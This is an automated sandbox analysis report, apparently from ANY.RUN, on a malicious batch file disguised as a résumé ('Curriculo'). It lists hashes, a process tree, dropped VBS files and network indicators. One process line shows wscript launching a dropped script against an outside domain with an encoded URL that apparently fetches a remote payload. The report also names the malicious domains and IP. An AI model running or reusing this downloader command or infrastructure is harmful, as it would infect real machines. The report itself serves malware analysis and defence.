File name: | Curriculo-102987912.cmd |
Full analysis: | https://app.any.run/tasks/101aada0-558e-46c2-b1dd-3c0882cace30 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 16:00:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 7EF3A86F811ED8E436511DD188672D95 |
SHA1: | FCDE9DBD6A14B23F46B935F8A56E8AC6D9E1858A |
SHA256: | AAF4001495B065C71165F10FE034A8DF27762D5E2E79C6F51E11848002F3AEEE |
SSDEEP: | 96:2dhDgbko5qn+6N4GuAkIpq0SRHmst/0P3teNPA+sV39pudOhH1QSsC:2dhDg17NN9q392C |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3364 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Curriculo-102987912.cmd" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2276 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1704 | wscript //Nologo "C:\ProgramData\windows\.GGGGGwu\admin.vbs" AS111 https://pt-br.ooguy.com/appkcmd/aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItbXMvQ0MxL29pNGZ0MWJwcXIuYm1wJm5vLXBvd2Vy | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | cmd.exe | C:\ProgramData\windows\.GGGGGwu\admin.vbs | text | |
MD5:5987D02D5211AF4979F80912EA56BDC7 | SHA256:ECB8872428BFAB249DE3703DA21EDACCB5FE97C1542930CA06F043E8646139CF | |||
1704 | wscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1704 | wscript.exe | 54.207.55.139:443 | pt-br.ooguy.com | Amazon.com, Inc. | BR | unknown |
Domain | IP | Reputation |
---|---|---|
pt-br.ooguy.com |
| unknown |
edzz.la |
| unknown |